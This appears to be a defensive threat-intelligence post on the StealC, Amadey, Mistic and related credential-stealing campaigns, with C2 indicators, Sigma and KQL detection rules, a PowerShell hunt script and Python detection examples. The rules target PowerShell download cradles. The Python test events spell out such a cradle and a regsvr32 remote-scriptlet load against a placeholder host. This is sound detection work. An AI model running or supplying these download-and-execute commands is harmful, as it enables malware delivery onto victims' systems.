
StealC, Amadey & Mistic Backdoor: Credential Theft & Ransomware Access Analysis

Security Arsenal Team
June 25, 2026

Recent OTX pulses indicate a coordinated surge in cybercrime activity focused on credential harvesting and initial access brokering. The landscape is dominated by Malware-as-a-Service (MaaS) infostealer families, specifically StealC and Amadey, which silently harvest browser data, cookies, and session tokens to facilitate enterprise breaches. While Operation Endgame has disrupted a significant portion of the Amadey and StealC C2 infrastructure (seizing ~50 domains and 200 IPs), threat actors are actively pivoting.

Simultaneously, a new stealthy backdoor, Mistic, has been linked to the access broker Woodgnat, which supplies access to ransomware operations like Qilin and Black Basta. In a separate geopolitical thread, Kimsuky continues to evolve KimJongRAT using legitimate infrastructure like GitHub for delivery, while GhostShell targets Ukraine's UAV supply chain using Vidar stealer. The collective objective across these campaigns is the theft of identity credentials to enable downstream financial fraud or ransomware deployment.

Threat Actor / Malware Profile

1. StealC & Amadey (MaaS Infostealers)

  • Distribution: Phishing attachments, malicious cracks/keygens, and secondary payload delivery via other loaders.
  • Payload Behavior: StealC (C++) targets browsers, crypto wallets, and 2FA extensions. Amadey acts as a botnet agent and downloader.
  • C2 Communication: HTTP/HTTPS POST requests to specific domains (e.g., microsoft-telemetry.at) often utilizing spoofed telemetry user-agents.
  • Persistence: Scheduled tasks or Registry Run keys.

2. Mistic Backdoor & Woodgnat

  • Actor: Woodgnat (Initial Access Broker).
  • Behavior: Uses DLL sideloading to execute the Mistic backdoor. It serves as a persistent foothold, often leading to ransomware (Qilin, Interlock).
  • Associated Tools: ModeloRAT, D3F@ck Loader.

3. KimJongRAT (Kimsuky)

  • Distribution: Phishing emails with shortened URLs pointing to GitHub Releases hosting malicious ZIPs.
  • Behavior: Combines info-stealing with Remote Access Trojan (RAT) capabilities.
  • Targeting: Initially observed targeting Japan, but infrastructure is globally accessible.

4. Vidar Stealer (GhostShell)

  • Target: Ukraine Defense sector / UAV supply chain.
  • Method: Malicious archives impersonating legitimate entities (Besomar).

IOC Analysis

The provided pulses yield high-fidelity indicators across multiple categories:

  • Network Infrastructure (C2):

    • Domains: microsoft-telemetry.at, svclsc.com, googleoba.servequake.com, mail.authorized-logins.net.
    • IPs: 176.124.199.207, 176.111.174.140, 104.200.67.46.
    • Operationalization: SOC teams should immediately block these IPs and domains on perimeter firewalls and proxies. The domains microsoft-telemetry.at and svclsc.com are clear examples of vendor/service-name spoofing, chosen so that C2 traffic blends in with legitimate telemetry and slips past network monitoring.
  • File Hashes (Payloads):

    • SHA256: 8cef760d11d24fc2e9bbd9f770dca5105854f7ece3b0e6948d7c8b7fdd1765ea (StealC), 3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be (Mistic).
    • Operationalization: Load these into EDR solutions for immediate quarantine. Use these hashes to hunt for historical detections on endpoints.
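The IOC list above is exact-match material; the spoofing observation behind microsoft-telemetry.at and googleoba.servequake.com also generalizes into a heuristic that catches lookalike names the list does not yet contain. The following is an added example, not code from the Security Arsenal post: it flags a queried hostname when a trusted brand keyword appears in its labels while the registrable domain is not one the brand owns. The BRAND_DOMAINS allowlist, the log format and the sample DNS log are constructed for illustration, and the registrable-domain extraction is deliberately simplified.

```python
"""Heuristic for brand-spoofing hostnames such as microsoft-telemetry.at.

Added example (not code from the Security Arsenal post). It flags a hostname
whose labels contain a trusted brand keyword while its registrable domain is
not one the brand actually owns. BRAND_DOMAINS and SAMPLE_DNS_LOG are
constructed for illustration.
"""
from typing import List, Optional, Tuple

# Constructed allowlist: brand keyword -> registrable domains that brand owns.
# Illustrative only; a production list would be maintained from vendor data.
BRAND_DOMAINS = {
    "microsoft": {"microsoft.com", "msftconnecttest.com", "windows.com"},
    "google": {"google.com", "googleapis.com", "gstatic.com"},
}


def registrable_domain(hostname: str) -> str:
    """Return the last two labels of a hostname.

    Deliberate simplification: a real implementation should use the Public
    Suffix List so that names under suffixes like co.uk are handled correctly.
    """
    labels = hostname.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def spoofed_brand(hostname: str) -> Optional[str]:
    """Return the brand keyword a hostname impersonates, or None.

    A name is flagged only when the keyword appears somewhere in the hostname
    and the registrable domain is outside the brand's own domains, so
    settings-win.data.microsoft.com passes while microsoft-telemetry.at and
    googleoba.servequake.com are flagged.
    """
    host = hostname.lower()
    reg = registrable_domain(host)
    for brand, owned in BRAND_DOMAINS.items():
        if brand in host and reg not in owned:
            return brand
    return None


# Constructed DNS query log: "<timestamp> <endpoint> DNS <queried name>" per line.
SAMPLE_DNS_LOG = """\
2026-06-25T10:01:12Z WS-0142 DNS settings-win.data.microsoft.com
2026-06-25T10:01:15Z WS-0142 DNS microsoft-telemetry.at
2026-06-25T10:02:03Z WS-0077 DNS googleoba.servequake.com
2026-06-25T10:02:40Z WS-0077 DNS svclsc.com
2026-06-25T10:03:11Z WS-0099 DNS clients2.google.com
"""


def hunt_dns_log(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (endpoint, queried name, spoofed brand) for each flagged query."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != "DNS":
            continue  # skip malformed lines rather than aborting the hunt
        _timestamp, endpoint, _, qname = parts
        brand = spoofed_brand(qname)
        if brand:
            hits.append((endpoint, qname, brand))
    return hits


if __name__ == "__main__":
    for endpoint, qname, brand in hunt_dns_log(SAMPLE_DNS_LOG):
        print(f"[!] {endpoint} queried {qname} (impersonates {brand})")
```

Note what the heuristic does not catch: svclsc.com carries no brand keyword and is only caught by the explicit IOC blocklist, so the check complements the list rather than replacing it. Run the hunt against a real DNS log by feeding the same four-field line format through hunt_dns_log and reviewing the (endpoint, name, brand) hits.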

Detection Engineering

Detection rules focus on the C2 infrastructure identified in the Operation Endgame takedown and the specific delivery mechanisms of Mistic/KimJongRAT.

Sigma rules (YAML):
title: Potential StealC or Amadey C2 Communication - OTX Pulse
id: 8b2e5c17-6a12-4b9c-9f1d-1a3b4c5d6e7f
description: Detects network connections to known StealC and Amadey C2 infrastructure and associated domains identified in Operation Endgame pulses.
author: Security Arsenal
date: 2026/06/26
modified: 2026/06/26
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationHostname|contains:
            - 'microsoft-telemetry.at'
            - 'svclsc.com'
            - 'goodpanelforgoodjob.com'
            - 'googleoba.servequake.com'
            - 'corpsecs.com'
            - 'authorized-logins.net'
            - 'overlapsnowbound.com'
    selection_ips:
        # Exact match: startswith on a full address would also match longer addresses sharing the prefix
        DestinationIp:
            - '176.124.199.207'
            - '176.111.174.140'
            - '62.60.226.159'
            - '94.154.35.25'
            - '64.188.91.237'
            - '104.200.67.46'
    condition: 1 of selection*
falsepositives:
    - Legitimate administrative access (unlikely for these specific domains)
level: high
---
title: Suspicious File Execution - Mistic Backdoor Component
id: a1b2c3d4-5678-90ab-cdef-1234567890ab
description: Detects execution of files with hashes associated with the Mistic backdoor and Woodgnat activity.
author: Security Arsenal
date: 2026/06/26
tags:
    - attack.execution
    - attack.t1204
logsource:
    category: process_creation
    product: windows
detection:
    selection_hashes:
        Hashes|contains:
            - '3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be'
    # Generic sideloading pattern: rundll32/regsvr32 loading a DLL whose command line
    # also carries a URL. Both substrings are required (contains|all); matching on
    # either alone would fire on nearly every legitimate rundll32 invocation.
    selection_generic:
        Image|endswith:
            - '\rundll32.exe'
            - '\regsvr32.exe'
        CommandLine|contains|all:
            - '.dll'
            - 'http'
    condition: 1 of selection*
falsepositives:
    - Rare; legitimate DLL loading should not involve these specific hashes
    - Administrative use of regsvr32 with remote scriptlets (review before closing)
level: critical
---
title: Credential Stealer Process Pattern - StealC/RedLine/Vidar
id: f1e2d3c4-b5a6-7890-cdef-123456789012
description: Detects a browser or Explorer spawning PowerShell/cmd with an in-memory download cradle (DownloadString/IEX), the staging pattern used by infostealers such as StealC, RedLine, and Vidar in recent pulses.
author: Security Arsenal
date: 2026/06/26
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_cradle:
        ParentImage|endswith:
            - '\explorer.exe'
            - '\chrome.exe'
            - '\firefox.exe'
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'downloadstring'
            - 'iex'
            - 'invoke-expression'
    condition: selection_cradle
falsepositives:
    - Administrator scripting
    - The short token 'iex' also occurs in paths such as iexplore.exe; review hits on that term
level: medium


KQL (Microsoft Defender advanced hunting):
// Hunt for StealC/Amadey/KimJongRAT C2 Traffic and File Hashes
// Unified query for DeviceNetworkEvents and DeviceFileEvents
let IOCs_Domains = dynamic(['microsoft-telemetry.at', 'svclsc.com', 'googleoba.servequake.com', 'mail.authorized-logins.net', 'mueleer.com', 'authorized-logins.net']);
let IOCs_IPs = dynamic(['176.124.199.207', '176.111.174.140', '62.60.226.159', '94.154.35.25', '64.188.91.237', '104.200.67.46']);
let IOCs_Hashes = dynamic(['8cef760d11d24fc2e9bbd9f770dca5105854f7ece3b0e6948d7c8b7fdd1765ea', '3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be']);
// Domains are term-matched inside the URL; IPs and hashes are exact values, so use in()
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (IOCs_Domains) or RemoteIP in (IOCs_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| union (
    DeviceFileEvents
    | where Timestamp > ago(30d)
    | where SHA256 in (IOCs_Hashes)
    | project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
)


PowerShell hunt script:
#Requires -RunAsAdministrator
# PowerShell Hunt Script: StealC, Amadey, Mistic Artifacts
# Requires Admin Privileges

Write-Host "[+] Hunting for StealC/Amadey/Mistic Artifacts..." -ForegroundColor Cyan

# 1. Check Hosts File for Telemetry Spoofing (Common in Amadey/StealC)
$hostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
$maliciousDomains = @('microsoft-telemetry.at', 'svclsc.com')
$hostsContent = Get-Content $hostsPath
$foundHosts = @()

foreach ($domain in $maliciousDomains) {
    # Escape the domain so '.' is matched literally rather than as a regex wildcard
    if ($hostsContent -match [regex]::Escape($domain)) {
        $foundHosts += $domain
        Write-Host "[!] ALERT: $domain found in hosts file! Possible DNS poisoning." -ForegroundColor Red
    }
}
if ($foundHosts.Count -eq 0) {
    Write-Host "[-] No spoofed domains found in hosts file." -ForegroundColor Green
}

# 2. Check for Suspicious Scheduled Tasks (Persistence)
Write-Host "[+] Checking Scheduled Tasks for Suspicious Actions..." -ForegroundColor Cyan
# Parentheses make the intended grouping explicit: -and binds tighter than -or
$suspiciousTasks = Get-ScheduledTask | Where-Object {
    ($_.Actions.Execute -like "*powershell*") -or
    ($_.Actions.Execute -like "*cmd*") -or
    ($_.Actions.Arguments -match "http") -or
    ($_.TaskName -match "Update" -and [string]::IsNullOrEmpty($_.Author))
}

if ($suspiciousTasks) {
    Write-Host "[!] Found suspicious scheduled tasks:" -ForegroundColor Yellow
    $suspiciousTasks | Select-Object TaskName, Author, @{Name="Action";Expression={$_.Actions.Execute}} | Format-Table
} else {
    Write-Host "[-] No obviously suspicious scheduled tasks found." -ForegroundColor Green
}

# 3. Network Connection Check (Active C2)
Write-Host "[+] Checking Active Network Connections for C2 IPs..." -ForegroundColor Cyan
$maliciousIPs = @('176.124.199.207', '176.111.174.140', '104.200.67.46')
$connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue

foreach ($ip in $maliciousIPs) {
    $hit = $connections | Where-Object { $_.RemoteAddress -eq $ip }
    if ($hit) {
        # $hit.OwningProcess may hold several PIDs; Get-Process accepts the array
        Write-Host "[!] CRITICAL: Active connection to malicious IP $ip detected (PID: $($hit.OwningProcess))" -ForegroundColor Red
        Get-Process -Id $hit.OwningProcess | Select-Object ProcessName, Path
    }
}

Write-Host "[+] Hunt Complete." -ForegroundColor Cyan

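Before the Sigma and KQL content goes into a SIEM, it helps to have the same logic in a form that can be unit-tested against known-good and known-bad events. The following is an added example, not part of the Security Arsenal post: a plain-Python evaluator for the three detections above, run over constructed Sysmon-style events. The IOC domains, IPs and the Mistic hash are those listed in this report; the events, the field subset and the host c2.invalid (a reserved placeholder TLD) are constructed. The rundll32/regsvr32 branch requires both a '.dll' and a URL on the command line, and 'iex' is matched as a whole word so that paths like iexplore.exe do not trip it.

```python
"""Reference implementation of the three detection rules as plain Python.

Added example, not part of the Security Arsenal post. IOC values are the ones
listed in the report; the Sysmon-style events in SAMPLE_EVENTS are constructed
and c2.invalid is a placeholder host (.invalid is reserved).
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# IOCs from the report (domains matched as substrings, IPs and hash exactly).
C2_DOMAINS = (
    "microsoft-telemetry.at", "svclsc.com", "goodpanelforgoodjob.com",
    "googleoba.servequake.com", "corpsecs.com", "authorized-logins.net",
    "overlapsnowbound.com",
)
C2_IPS = frozenset({
    "176.124.199.207", "176.111.174.140", "62.60.226.159",
    "94.154.35.25", "64.188.91.237", "104.200.67.46",
})
MISTIC_SHA256 = "3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be"

# Word-bounded 'iex' so that paths such as iexplore.exe do not match.
CRADLE_RE = re.compile(r"downloadstring|\biex\b|invoke-expression", re.IGNORECASE)


def rule_c2_connection(ev: Event) -> bool:
    """Outbound connection to a listed C2 domain or IP (network_connection)."""
    if ev.get("EventType") != "network_connection" or ev.get("Initiated") != "true":
        return False
    host = ev.get("DestinationHostname", "").lower()
    return any(d in host for d in C2_DOMAINS) or ev.get("DestinationIp") in C2_IPS


def rule_mistic_execution(ev: Event) -> bool:
    """Known Mistic hash, or rundll32/regsvr32 loading a DLL with a URL on the command line."""
    if ev.get("EventType") != "process_creation":
        return False
    if MISTIC_SHA256 in ev.get("Hashes", "").lower():
        return True
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    loader = image.endswith(("\\rundll32.exe", "\\regsvr32.exe"))
    return loader and ".dll" in cmd and "http" in cmd


def rule_download_cradle(ev: Event) -> bool:
    """Browser or Explorer spawning PowerShell/cmd with an in-memory download cradle."""
    if ev.get("EventType") != "process_creation":
        return False
    parent = ev.get("ParentImage", "").lower()
    image = ev.get("Image", "").lower()
    if not parent.endswith(("\\explorer.exe", "\\chrome.exe", "\\firefox.exe")):
        return False
    if not image.endswith(("\\powershell.exe", "\\cmd.exe")):
        return False
    return CRADLE_RE.search(ev.get("CommandLine", "")) is not None


RULES = {
    "stealc_amadey_c2": rule_c2_connection,
    "mistic_execution": rule_mistic_execution,
    "stealer_download_cradle": rule_download_cradle,
}


def evaluate(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, EventId) for every rule that fires on every event."""
    return [(name, ev["EventId"]) for ev in events
            for name, rule in RULES.items() if rule(ev)]


# Constructed events; only the fields the rules read are included.
SAMPLE_EVENTS: List[Event] = [
    {"EventId": "n1", "EventType": "network_connection", "Initiated": "true",
     "DestinationHostname": "svclsc.com", "DestinationIp": "203.0.113.10"},
    {"EventId": "n2", "EventType": "network_connection", "Initiated": "true",
     "DestinationHostname": "settings-win.data.microsoft.com", "DestinationIp": "203.0.113.11"},
    {"EventId": "n3", "EventType": "network_connection", "Initiated": "true",
     "DestinationHostname": "", "DestinationIp": "176.124.199.207"},
    {"EventId": "p1", "EventType": "process_creation", "Hashes": "SHA256=aaaa",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},  # benign: no URL
    {"EventId": "p2", "EventType": "process_creation", "Hashes": "SHA256=bbbb",
     "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://c2.invalid/a.sct scrobj.dll"},
    {"EventId": "p3", "EventType": "process_creation", "Image": "C:\\Users\\Public\\update.exe",
     "CommandLine": "update.exe", "Hashes": "SHA256=" + MISTIC_SHA256.upper()},
    {"EventId": "p4", "EventType": "process_creation",
     "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s.ps1')"},
    {"EventId": "p5", "EventType": "process_creation", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe Start-Process iexplore.exe"},  # 'iex' inside a word: no hit
]

if __name__ == "__main__":
    for name, event_id in evaluate(SAMPLE_EVENTS):
        print(f"[!] {name}: event {event_id}")
```

Events p1 and p5 are the regression cases worth keeping when the rules are tuned: p1 shows why the loader branch must demand a URL as well as a DLL, and p5 shows the false positive a bare 'iex' substring would produce. Feeding real exported events into evaluate only requires mapping your log source's field names onto the Sysmon-style keys used here.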
Response Priorities

  • Immediate (0-4h):

    • Block IOCs: Implement blocks on all listed domains and IP addresses at the firewall and proxy level.
    • Isolate Hosts: Identify and isolate any endpoints with positive matches for the provided file hashes.
    • Hunt Persistence: Search for Scheduled Tasks or Registry Run keys referencing the spoofed microsoft-telemetry.at domain.
  • Within 24h:

    • Credential Reset: If StealC, Amadey, or Vidar infection is confirmed, force a password reset for all user sessions active on the compromised machine within the window of infection.
    • Session Token Revocation: Invalidate session tokens and cookies for corporate SaaS applications accessed from the infected host.
  • Within 1 Week:

    • Architecture Hardening: Review policies regarding the execution of code from GitHub (mitigates KimJongRAT vector) and restrict the creation of child processes by Office applications.
    • Supply Chain Audit: Given the GhostShell activity, audit third-party vendors, specifically those in the defense or manufacturing sector, for unusual data exchange or email traffic.
